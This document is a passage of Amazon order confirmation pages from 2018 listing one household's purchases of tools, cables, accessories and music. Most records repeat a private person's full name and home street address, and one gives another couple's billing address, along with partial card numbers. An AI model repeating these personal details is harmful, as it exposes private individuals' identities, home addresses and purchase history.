#114-5347195-2580232 Order Placed: September 23, 2018 Amazon.com order number: 114-5347195-2580232 Order Total: $35.95 Shipped on September 24, 2018 Items Ordered Price 1 of: USB Type C Cable 10ft, CableCreation USB-C to USB-C Braided Data & Charging Cable (20V,3A) up to 480Mbps Compatible Apple Macbook(Pro), Nintendo Switch, Galaxy S9/S9+, Pixel XL 2,etc (Space Gray) Sold by: CableCreation (seller profile) | Product question? Ask Seller $7.99 Condition: New 4 of: METRANS USB C to Lightning Cable 3FT/1M for iPhone X/ 8/8 Plus iPad Connect to $6.99 MacBook and Other USB C Devices Grey Sold by: Metrans Direct (seller profile) Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $35.95 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $35.95 BRIAN J COADY Estimated tax to be collected: $0.00 1454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$35.95 United States Credit Card transactions AmazonPLCC ending in 3157: September 24, 2018:$35.95 Final Details for Order #114-5785822-3012218 Order Placed: September 15, 2018 Amazon.com order number: 114-5785822-3012218 Order Total: $25.23 Shipped on September 19, 2018 Items Ordered Price 1 of: Koala Lifestyle Gorilla Grips Rope Eyewear Retainer Sunglass Strap | Eyeglass & Sports Glasses Holder Keeper Lanyard | 3pk Bundle + Cloth, Black Sold by: Koala Lifestyle (seller profile) $12.24 Condition: New 1 of: Tactical Sunglass Straps -Made in USA -Patent Pending Design -Universal Fit Glasses Retainer System for any Shooting / Safety or Sunglasses -Tac Strapz by Relentless Tactical -Adjustable Black Sold by: Relentless Brands (seller profile) $12.99 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: No-Rush Shipping Payment information Payment Method: Item(s) Subtotal: $25.23 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $25.23 BRIAN J COADY Estimated tax to be collected: $0.00 1454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$25.23 United States Credit Card transactions AmazonPLCC ending in 3157: September 19, 2018:$25.23 Final Details for Order #114-3772852-2569814 Order Placed: September 15, 2018 Amazon.com order number: 114-3772852-2569814 Order Total: $6.98 Shipped on September 21, 2018 Items Ordered Price 1 of: Anti-Slip Glasses Ear Hook Grip -3 Pack -Stretchy Fit for Sunglasess and Glasses $6.98 Sold by: Anchor Glasses Straps (seller profile) Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Shipping Payment information Payment Method: Item(s) Subtotal: $6.98 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $6.98 BRIAN J COADY Estimated tax to be collected: $0.00 1454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$6.98 United States Credit Card transactions AmazonPLCC ending in 3157: September 21, 2018:$6.98 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #114-8248926-3882627 Order Placed: September 4, 2018 Amazon.com order number: 114-8248926-3882627 Order Total: $28.99 Shipped on September 8, 2018 Items Ordered Price 1 of: 1984 for the Love of Big Brother, Eurythmics Sold by: Mxdd40 (seller profile) $25.00 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Shipping Payment information Payment Method: Item(s) Subtotal: $25.00 MasterCard | Last digits: 5267 Shipping & Handling: $3.99 Billing address Total before tax: $28.99 Bryan and Sarah Suchomel Estimated tax to be collected: $0.00412 WESTCHESTER DR ROCKFORD, IL 61107-4758 Grand Total:$28.99 United States Credit Card transactions MasterCard ending in 5267: September 8, 2018:$28.99 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #113-7424044-8013048 Order Placed: August 23, 2018 Amazon.com order number: 113-7424044-8013048 Order Total: $24.48 Shipped on August 24, 2018 Items Ordered Price 1 of: Tales Of Mystery & Imagination [2 CD Deluxe Edition], The Alan Parsons Project $23.15 Sold by: Amazon.com Services LLC Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Visa | Last digits: 6396 Item(s) Subtotal: $23.15 Shipping & Handling: $0.00 ---- Billing address BRIAN J COADY 1454 MONROE ST NW Total before tax: $23.15 Estimated tax to be collected: $1.33 ---- WASHINGTON, DC 20010 United States Grand Total:$24.48 Credit Card transactions Visa ending in 6396: August 24, 2018:$24.48 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #114-8521705-2048242 Order Placed: August 11, 2018 Amazon.com order number: 114-8521705-2048242 Order Total: $22.77 Shipped on August 12, 2018 Items Ordered Price 3 of: MIIX HOME Furniture Wheel Gripper Caster Cups, Non-Slip Bed Risers, Furniture wheel stopper, Cups for Bed, Sofa, Table and Chair, Floor protector, Set of 4 Black Sold by: flash2ning (seller profile) | Product question? Ask Seller $7.99 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $23.97 Visa | Last digits: 6396 Shipping & Handling: $0.00 Promotion Applied: -$1.20 Billing address BRIAN J COADY Total before tax: $22.771454 MONROE ST NW Estimated tax to be collected: $0.00WASHINGTON, DC 20010 United States Grand Total:$22.77 Credit Card transactions Visa ending in 6396: August 12, 2018:$22.77 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #113-5994132-3712241 Order Placed: August 8, 2018 Amazon.com order number: 113-5994132-3712241 Order Total: $36.97 Shipped on August 9, 2018 Items Ordered Price 1 of: Philips Hue White and Color Ambiance BR30 60W Equivalent Dimmable LED $34.96 Smart Flood Light (Newest Model Compatible with Amazon Alexa Apple HomeKit and Google Assistant) Sold by: Amazon.com Services LLC Condition: Used -Acceptable Cosmetic imperfection(s) bigger than 1" on top, front or sides of item. Item will come repackaged. Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Visa | Last digits: 6396 Item(s) Subtotal: $34.96 Shipping & Handling: $0.00 ---- Billing address BRIAN J COADY 1454 MONROE ST NW Total before tax: $34.96 Estimated tax to be collected: $2.01 ---- WASHINGTON, DC 20010 United States Grand Total:$36.97 Credit Card transactions Visa ending in 6396: August 9, 2018:$36.97 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #114-3079775-9161026 Order Placed: August 7, 2018 Amazon.com order number: 114-3079775-9161026 Order Total: $26.30 Shipped on August 8, 2018 Items Ordered Price 1 of: Taylor Digital Cooking Probe Thermometer and Timer Sold by: Amazon.com Services LLC $17.31 Condition: New 1 of: MIIX HOME Furniture Wheel Gripper Caster Cups, Non-Slip Bed Risers, Furniture wheel stopper, Cups for Bed, Sofa, Table and Chair, Floor protector, Set of 4 Black Sold by: flash2ning (seller profile) | Product question? Ask Seller $7.99 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $25.30 Visa | Last digits: 6396 Shipping & Handling: $0.00 Billing address Total before tax: $25.30BRIAN J COADY Estimated tax to be collected: $1.001454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$26.30 United States Credit Card transactions Visa ending in 6396: August 8, 2018:$26.30 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #114-2507255-0013040 Order Placed: July 23, 2018 Amazon.com order number: 114-2507255-0013040 Order Total: $25.63 Shipped on July 24, 2018 Items Ordered Price 2 of: Moveland Cast Iron Cleaner Premium 316 Stainless Steel Chainmail Scrubber for Clean Cast Iron Pan, Grill, Griddle, Cookware Sold by: Moveland (seller profile) $7.97 Condition: New 1 of: WYZworks Adjustable Adult Magic Fast Folder Clothes T-Shirts Folding Board (Grey) Sold by: WYZworks (seller profile) $9.69 Condition: New New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $25.63 Visa | Last digits: 6396 Shipping & Handling: $0.00 Billing address Total before tax: $25.63 BRIAN J COADY Estimated tax to be collected: $0.001454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$25.63 United States Credit Card transactions Visa ending in 6396: July 24, 2018:$25.63 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #114-8742153-9447430 Order Placed: July 17, 2018 Amazon.com order number: 114-8742153-9447430 Order Total: $43.03 Shipped on July 17, 2018 Items Ordered Price 1 of: ASURION 3 Year Home Improvement Extended Protection Plan ($450 -$499.99) $40.69 Sold by: Asurion, LLC (seller profile) Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Expedited Shipping Payment information Payment Method: Visa | Last digits: 6396 Item(s) Subtotal: $40.69 Shipping & Handling: $0.00 ---- Billing address BRIAN J COADY 1454 MONROE ST NW Total before tax: $40.69 Estimated tax to be collected: $2.34 ---- WASHINGTON, DC 20010 United States Grand Total:$43.03 Credit Card transactions Visa ending in 6396: July 17, 2018:$43.03 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #114-7290866-5969054 Order Placed: July 17, 2018 Amazon.com order number: 114-7290866-5969054 Order Total: $639.16 Shipped on July 18, 2018 Items Ordered 1 of: Bosch 32 Piece Impact Tough Screwdriving Bit Set SBID32 Sold by: Amazon.com Services LLC Price $12.98 Condition: New 1 of: Soufull Chef Knife 8 inches Japanese Stainless Steel Gyutou Knife Professional Kitchen Knife with Ergonomic Handle Sold by: yichengjin (seller profile) $29.99 Condition: New 1 of: BIC Hybrid 3 Comfort Disposable Razor, Men, 12-Count Sold by: Amazon.com Services LLC $11.94 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Shipped on July 17, 2018 Items Ordered 1 of: Isle Bay Linens Men's Standard Fit 100% Linen Floral Hawaiian Short Sleeve Casual Shirt Floral Large Sold by: Isle Bay Linens (seller profile) Price $39.00 Condition: New 1 of: First Aid Only All-purpose First Aid Kit, Soft Case, 299-Piece Kit Sold by: Amazon.com Services LLC FSA or HSA eligible $16.54 Condition: New 1 of: KitchenGynti Scented Candles Gift Set -Lavender, Rose, Tea Tree and Peppermint, Candle Soy Wax for Stress Relief and Aromatherapy, Christmas Gift Candles -4 Pack Sold by: GynTi (seller profile) | Product question? Ask Seller $15.98 Print this page for your records. Condition: New 1 of: Compression Socks (6 Pairs) for Women and Men Sport Plantar Fasciitis Arch $18.99 Support Low Cut Running Gym Compression Foot Socks/Foot Sleeves Best for Sports (Small/Medium) Sold by: pink kiss (seller profile) Condition: New 1 of: Melissa & Doug Felt Food Sandwich Play Food Set (33 pcs), Melissa & Doug $17.99 Sold by: Amazon.com Services LLC Condition: New 1 of: Isle Bay Linens Men's Standard Fit 100% Linen Floral Hawaiian Short Sleeve $39.00 Casual Shirt Floral X-Large Sold by: Isle Bay Linens (seller profile) Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Shipped on July 17, 2018 Items Ordered Price 1 of: Bosch SDS-Max Demolition Hammer 11321EVS $479.00 Sold by: Amazon.com Services LLC Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $681.41 Visa | Last digits: 6396 Shipping & Handling: $0.00 Prime Savings: -$50.00 Billing address Deal of the Day: -$6.52 BRIAN J COADY Prime Savings: -$1.65 1454 MONROE ST NW Grand Total:$639.16 FSA or HSA eligible FSA or HSA eligible amount (includes taxes & shipping): $15.75 Credit Card transactions Visa ending in 6396: July 18, 2018:$639.16 To view the status of your order, return to Order Summary. Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates Final Details for Order #114-5337479-7255462 Order Placed: July 7, 2018 Amazon.com order number: 114-5337479-7255462 Order Total: $64.47 Shipped on July 8, 2018 Items Ordered 2 of: iPhone X Camera Lens Protector -Ultra-thin High Definition 9H Hardness 2.5D Bubble-Free Anti-Scratch Clear Camera Lens Protector Film for iPhone X/10 Sold by: EshinTech (seller profile) Price $7.99 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Shipped on July 8, 2018 Items Ordered 1 of: Square Jellyfish Jelly Grip Car Vent Mount for Smartphones & Garmin GPS Sold by: Square Jellyfish (seller profile) | Product question? Ask Seller Price $17.95 Condition: New 1 of: iOttie Adhesive Dashboard Pad for iOttie Car Mounts Flexible Dashboard Pad for Curved Surfaces Sold by: iOttie (seller profile) $5.99 Condition: New 1 of: CYHONG Cell Phone Finger Holder 360° Rotation Finger Ring Stand Magnetic Car Mount Universal Smartphones Kickstand for iPhone 8/8s Plus, iPhone 7/7 Plus, Samsung Galaxy S8/S8 (black) Sold by: CYHONG (seller profile) $6.98 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 Print this page for your records. Shipping Speed: Two-Day Shipping Shipped on July 8, 2018 Items Ordered Price 1 of: iOttie Easy One Touch 2 Car Mount Universal Phone Holder for iPhone X 8/8 Plus $16.95 7 7 Plus 6s Plus 6s 6 SE Samsung Galaxy S9 S9 Plus S8 Plus S8 Edge S7 S6 Note 8 5 Sold by: Amazon.com Services LLC Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $63.85 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Your Coupon Savings: -$0.35 Billing address BRIAN J COADY Total before tax: $63.501454 MONROE ST NW Estimated tax to be collected: $0.97WASHINGTON, DC 20010 United States Grand Total:$64.47 Credit Card transactions AmazonPLCC ending in 3157: July 8, 2018:$17.92 AmazonPLCC ending in 3157: July 8, 2018:$46.55 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #114-4888100-5087428 Order Placed: July 7, 2018 Amazon.com order number: 114-4888100-5087428 Order Total: $9.51 Shipped on July 8, 2018 Items Ordered Price 1 of: Swash 80240512 Pods Awaken Cups (12 Pack), Orange Sold by: Amazon.com Services LLC $8.99 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $8.99 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $8.99 BRIAN J COADY Estimated tax to be collected: $0.52 1454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$9.51 United States Credit Card transactions AmazonPLCC ending in 3157: July 8, 2018:$9.51 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-6189161-4449804 Order Placed: June 15, 2018 Amazon.com order number: 111-6189161-4449804 Order Total: $198.43 Shipped on June 15, 2018 Items Ordered Price 1 of: Bosch BAT612 18-volt Lithium-Ion 2.0 Ah Slim Pack Battery with Digital Fuel $69.00 Gauge AH battery Sold by: Amazon.com Services LLC Condition: New 1 of: Bosch WCBAT620 18V 4.0Ah Wireless Charging Battery $112.99 AH battery Sold by: Amazon.com Services LLC Condition: New 1 of: IDS 2 Pack Garden Syringe, 100 mL/cc 3.4oz $5.97 Sold by: NB SF (seller profile) Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Same-Day Delivery Payment information Payment Method: Item(s) Subtotal: $187.96 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $5.99 Free Shipping: -$5.99 Billing address BRIAN J COADY Total before tax: $187.96 1454 MONROE ST NW Estimated tax to be collected: $10.47 WASHINGTON, DC 20010 United States Grand Total:$198.43 Credit Card transactions AmazonPLCC ending in 3157: June 15, 2018:$198.43 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates Final Details for Order #114-2823613-4221059 Order Placed: June 7, 2018 Amazon.com order number: 114-2823613-4221059 Order Total: $69.44 Shipped on June 7, 2018 Items Ordered Price 1 of: Hand Press Grommet Machine 3 Die (#0#2#4) with 900 Grommets Eyelet Tool Kit Sold by: Rampmu (seller profile) $62.99 Condition: New 1 of: Rockin Beads 50 pack Toggle Sewing Wood Toggle Buttons 1-1/4x1/2" Chery Oval Sold by: Rockin Beads (seller profile) | Product question? Ask Seller $6.45 Condition: New US Seller: Volume Discounts Eligible for PRIME Amazon Fast or FREE Super Saving Shipping with $35 purchase! Hassle free return policy. Tracking number provided in your Amazon account with every order. Stored, Packed & Shipped by Amazon! Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $69.44 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $69.44 BRIAN J COADY Estimated tax to be collected: $0.00 1454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$69.44 United States Credit Card transactions AmazonPLCC ending in 3157: June 7, 2018:$69.44 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates Final Details for Order #114-9008183-0369842 Order Placed: June 5, 2018 Amazon.com order number: 114-9008183-0369842 Order Total: $36.99 Shipped on June 13, 2018 Items Ordered Price 1 of: Hand Press Heavy Duty Grommet Machine with 3 Dies (#0 #2 #4) and 1500 Pcs $36.99 Grommets Eyelet Tool Kit Sold by: Bingopaw (seller profile) Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $36.99 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $36.99BRIAN J COADY Estimated tax to be collected: $0.001454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$36.99 United States Credit Card transactions AmazonPLCC ending in 3157: June 13, 2018:$36.99 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #114-6571222-8871448 Order Placed: June 5, 2018 Amazon.com order number: 114-6571222-8871448 Order Total: $45.17 Shipped on June 5, 2018 Items Ordered Price 2 of: 3M 3435 Blue Micro Prismatic Sheeting Reflective Tape, 0.75" x 5 yd (1 Roll) Sold by: Amazon.com Services LLC $7.19 Condition: New 3 of: B REFLECTIVE, (4 Pack) 12 retro reflective stickers kit, Night visibility safety, Universal adhesive for Bike/Stroller/Buggy/Helmet/Motorcycle/Scooter/Toys, 7 x 1,8 cm, Black Sold by: VFACTORY USA (seller profile) $9.99 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Same-Day Delivery Payment information Payment Method: Item(s) Subtotal: $44.35 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $5.99 Free Shipping: -$5.99 Billing address BRIAN J COADY Total before tax: $44.351454 MONROE ST NW Estimated tax to be collected: $0.82WASHINGTON, DC 20010 United States Grand Total:$45.17 Credit Card transactions AmazonPLCC ending in 3157: June 5, 2018:$45.17 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #114-1347076-1238604 Order Placed: June 5, 2018 Amazon.com order number: 114-1347076-1238604 Order Total: $31.31 Shipped on June 6, 2018 Items Ordered Price 1 of: Phone Holder for Car,Universal Car Phone Mount with Adjustable Dashboard Windshield Air Vent iPhone Car Mount for iPhone X/8/7/7 Plus and More (Black Grey) by SPCEUTOH Sold by: LongGoGo (seller profile) | Product question? Ask Seller $10.99 Condition: New 1 of: Tulip Rubber Bands 30-pc Sold by: Amazon.com Services LLC $3.30 Condition: New 3 of: 1/4" Grommet Eyelet Setting Pliers with 100 Silver Grommets Sold by: Online Shopping. (seller profile) $5.61 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $31.12 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $31.12 BRIAN J COADY Estimated tax to be collected: $0.19 1454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$31.31 United States Credit Card transactions AmazonPLCC ending in 3157: June 6, 2018:$31.31 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates Final Details for Order #114-5406997-2333068 Order Placed: June 3, 2018 Amazon.com order number: 114-5406997-2333068 Order Total: $30.04 Shipped on June 4, 2018 Items Ordered Price 2 of: PlasticMill Rubber Bands -#33 Size -Blue Rubberbands -1LB/500 Count Sold by: PlasticMill (seller profile) | Product question? Ask Seller $15.02 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $30.04 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $30.04 BRIAN J COADY Estimated tax to be collected: $0.001454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$30.04 United States Credit Card transactions AmazonPLCC ending in 3157: June 4, 2018:$30.04 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-7155755-8284221 Order Placed: May 25, 2018 Amazon.com order number: 111-7155755-8284221 Order Total: $26.48 Shipped on May 26, 2018 Items Ordered Price 1 of: Bosch Bosch L-RACK-T Top Handle for use with L-RACK-S Sold by: Acme Tools (seller profile) $19.99 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Shipping Payment information Payment Method: Item(s) Subtotal: $19.99 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $6.49 Billing address Total before tax: $26.48 BRIAN J COADY Estimated tax to be collected: $0.001454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$26.48 United States Credit Card transactions AmazonPLCC ending in 3157: May 26, 2018:$26.48 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-2737034-4661822 Order Placed: May 25, 2018 Amazon.com order number: 111-2737034-4661822 Order Total: $178.87 Shipped on May 26, 2018 Items Ordered Price 1 of: Bosch Bosch LST72-OD 72mm Drawer for use with L-RACK Click and Go Storage $11.99 System Sold by: Amazon.com Services LLC Condition: New 1 of: Ecoduty 8 in tent stake, landscape stake, sod staple for camping, straw blanket, $14.99 weed barrier, landscape fabric (25) Sold by: One Team One Dream Solutions (seller profile) Condition: New 1 of: Magarrow 6.5" Lightweight Tent Stakes V-shaped 304 Stainless Steel Outdoor $8.99 Camping Trip Hiking Tent Pegs Stakes (12pcs or 6pcs) (6 PCS) Sold by: MAGARROW Store (seller profile) Condition: New 1 of: Flexible Reflective Tape 0.5"X5' DOT-C2 High Intensity Grade White Silver $5.99 Multipal Size rolls -0.5 inch Waterproof Reflector Consipicuity Safety Tape for Vehicles Cars Trailers Bikes Helmets Sold by: Starrey (seller profile) Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Shipped on May 26, 2018 Items Ordered Price 1 of: Bosch 17.5 In. x 14 In. x 4.5 In. Stackable Carrying Case with 13 pc. Insert Set $54.00 Sold by: Amazon.com Services LLC Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Shipped on May 26, 2018 Items Ordered Price 1 of: Plastic Tool Box | SORTIMO BOSCH Tool Box L-Boxx 238 Size 3 Anthracite | $79.11 Professional Empty Hand Tool Box Latch | Tough Tool Box Tray Organizer Sold by: (seller profile) Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $175.07 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $175.07 BRIAN J COADY Estimated tax to be collected: $3.801454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$178.87 United States Credit Card transactions AmazonPLCC ending in 3157: May 26, 2018:$178.87 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-0842085-0816243 Order Placed: May 25, 2018 Amazon.com order number: 111-0842085-0816243 Order Total: $96.98 Shipped on May 26, 2018 Items Ordered Price 1 of: Victure Trail Camera 1080P 12MP Wildlife Camera Motion Activated Night Vision $59.99 20m with 2.4" LCD Display IP66 Waterproof Design for Wildlife Hunting and Home Security Sold by: Victure Direct (seller profile) Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Shipped on May 26, 2018 Items Ordered Price 1 of: Infrared Night Vision Mini Hidden Spy Camera Full HD 1080P with 140° Wide $36.99 Angle ,Wearable Mini Spy Camera Wireless Outdoor/Indoor Sports DV Motion Detecting PC Camera Taking Photo Driving Recorder. Sold by: Mony Fashion (seller profile) Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $96.98 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $96.98BRIAN J COADY Estimated tax to be collected: $0.001454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$96.98 United States Credit Card transactions AmazonPLCC ending in 3157: May 26, 2018:$59.99 AmazonPLCC ending in 3157: May 27, 2018:$36.99 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #114-9306772-6059421 Order Placed: May 17, 2018 Amazon.com order number: 114-9306772-6059421 Order Total: $298.95 Shipped on May 18, 2018 Items Ordered Price 1 of: Bosch GBH18V-26K24-RT CORE18V 6.3 Ah Cordless Lithium-Ion Brushless 1 in. $298.95 SDS-Plus Bulldog Rotary Hammer Kit (Certified Refurbished) Sold by: CPO Outlets (seller profile) Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $298.95 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $298.95BRIAN J COADY Estimated tax to be collected: $0.001454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$298.95 United States Credit Card transactions AmazonPLCC ending in 3157: May 18, 2018:$298.95 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #114-5614215-8672232 Order Placed: May 17, 2018 Amazon.com order number: 114-5614215-8672232 Order Total: $22.20 Shipped on May 17, 2018 Items Ordered Price 1 of: Bosch HS1427 SDS-Plus Hammer Shank 2-1/2-Inch by 10-Inch Wide Steel Self-$20.99 Sharpening Chisel Sold by: Amazon.com Services LLC Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $20.99 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $20.99BRIAN J COADY Estimated tax to be collected: $1.211454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$22.20 United States Credit Card transactions AmazonPLCC ending in 3157: May 17, 2018:$22.20 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #114-2772532-8097816 Order Placed: May 17, 2018 Amazon.com order number: 114-2772532-8097816 Order Total: $298.95 Shipped on May 18, 2018 Items Ordered Price 1 of: Bosch GBH18V-26K24-RT CORE18V 6.3 Ah Cordless Lithium-Ion Brushless 1 in. $298.95 SDS-Plus Bulldog Rotary Hammer Kit (Certified Refurbished) Sold by: CPO Outlets (seller profile) Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $298.95 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $298.95BRIAN J COADY Estimated tax to be collected: $0.001454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$298.95 United States Credit Card transactions AmazonPLCC ending in 3157: May 18, 2018:$298.95 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #113-4980910-8729821 Order Placed: April 24, 2018 Amazon.com order number: 113-4980910-8729821 Order 